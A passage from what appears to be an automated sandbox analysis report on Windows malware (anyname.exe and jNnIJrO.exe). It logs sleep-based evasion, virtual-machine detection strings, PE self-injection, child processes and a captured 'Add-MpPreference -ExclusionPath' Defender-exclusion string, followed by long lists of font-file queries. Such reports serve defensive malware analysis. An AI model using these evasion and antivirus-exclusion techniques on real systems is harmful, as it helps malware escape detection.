                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe TID: 4556Thread sleep time: -34703s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe TID: 5796Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe TID: 7068Thread sleep time: -17524406870024063s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe TID: 6012Thread sleep count: 2042 > 30
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe TID: 6012Thread sleep count: 7810 > 30
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeWindow / User API: threadDelayed 3203Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeWindow / User API: threadDelayed 6652Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeWindow / User API: threadDelayed 2042
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeWindow / User API: threadDelayed 7810
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeThread delayed: delay time: 38135Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeThread delayed: delay time: 40853Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeThread delayed: delay time: 34703Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeThread delayed: delay time: 922337203685477
                      Source: jNnIJrO.exe, 00000010.00000002.435288395.0000000002811000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                      Source: jNnIJrO.exe, 00000012.00000002.822956172.0000000001550000.00000004.00000010.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
                      Source: jNnIJrO.exe, 00000010.00000002.435288395.0000000002811000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: jNnIJrO.exe, 00000010.00000002.435288395.0000000002811000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: anyname.exe, 00000006.00000002.822114532.0000000001264000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlllter-0000
                      Source: jNnIJrO.exe, 00000010.00000002.435288395.0000000002811000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeCode function: 6_2_0614FBF0 LdrInitializeThunk,6_2_0614FBF0
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Benign windows process drops PE filesShow sources
                      Source: C:\Windows\System32\wscript.exeFile created: anyname.exe.0.drJump to dropped file
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeMemory written: C:\Users\user\AppData\Local\Temp\anyname.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeMemory written: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeMemory written: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\anyname.exe "C:\Users\user\AppData\Local\Temp\anyname.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess created: C:\Users\user\AppData\Local\Temp\anyname.exe C:\Users\user\AppData\Local\Temp\anyname.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess created: C:\Users\user\AppData\Local\Temp\anyname.exe C:\Users\user\AppData\Local\Temp\anyname.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess created: C:\Users\user\AppData\Local\Temp\anyname.exe C:\Users\user\AppData\Local\Temp\anyname.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess created: C:\Users\user\AppData\Local\Temp\anyname.exe C:\Users\user\AppData\Local\Temp\anyname.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess created: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess created: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeJump to behavior
                      Source: anyname.exe, 00000006.00000002.822929398.00000000018C0000.00000002.00020000.sdmp, jNnIJrO.exe, 00000012.00000002.823321744.00000000019E0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: anyname.exe, 00000006.00000002.822929398.00000000018C0000.00000002.00020000.sdmp, jNnIJrO.exe, 00000012.00000002.823321744.00000000019E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: anyname.exe, 00000006.00000002.822929398.00000000018C0000.00000002.00020000.sdmp, jNnIJrO.exe, 00000012.00000002.823321744.00000000019E0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: anyname.exe, 00000006.00000002.822929398.00000000018C0000.00000002.00020000.sdmp, jNnIJrO.exe, 00000012.00000002.823321744.00000000019E0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Users\user\AppData\Local\Temp\anyname.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
